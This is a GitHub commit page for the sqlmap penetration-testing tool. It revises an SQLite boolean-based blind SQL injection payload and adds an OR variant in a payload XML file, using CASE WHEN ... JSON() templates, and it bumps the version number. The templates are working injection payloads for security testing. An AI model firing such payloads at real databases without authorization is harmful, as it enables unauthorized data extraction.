Skip to content

Commit

Permalink
Minor update of SQLite specific payload (#5501)
Browse files Browse the repository at this point in the history
  • Loading branch information
stamparm committed Aug 26, 2023
1 parent 2f66aa8 commit 6d472dc
Show file tree
Hide file tree
Showing 2 changed files with 25 additions and 6 deletions.
29 changes: 24 additions & 5 deletions data/xml/payloads/boolean_blind.xml
Original file line number Diff line number Diff line change
Expand Up @@ -598,18 +598,37 @@ Tag: <test>
</test>

<test>
<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (json)</title>
<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
<stype>1</stype>
<level>1</level>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND CASE WHEN [INFERENCE] THEN 1 ELSE json('') END </vector>
<vector>AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
<request>
<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
</request>
<response>
<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
</response>
<details>
<dbms>SQLite</dbms>
</details>
</test>

<test>
<title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
<request>
<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE json('') END</payload>
<payload>OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
</request>
<response>
<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE json('') END</comparison>
<comparison>OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
</response>
<details>
<dbms>SQLite</dbms>
Expand Down
2 changes: 1 addition & 1 deletion lib/core/settings.py
Original file line number Diff line number Diff line change
Expand Up @@ -20,7 +20,7 @@
from thirdparty.six import unichr as _unichr

# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.7.8.8"
VERSION = "1.7.8.9"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
Expand Down

0 comments on commit 6d472dc

Please sign in to comment.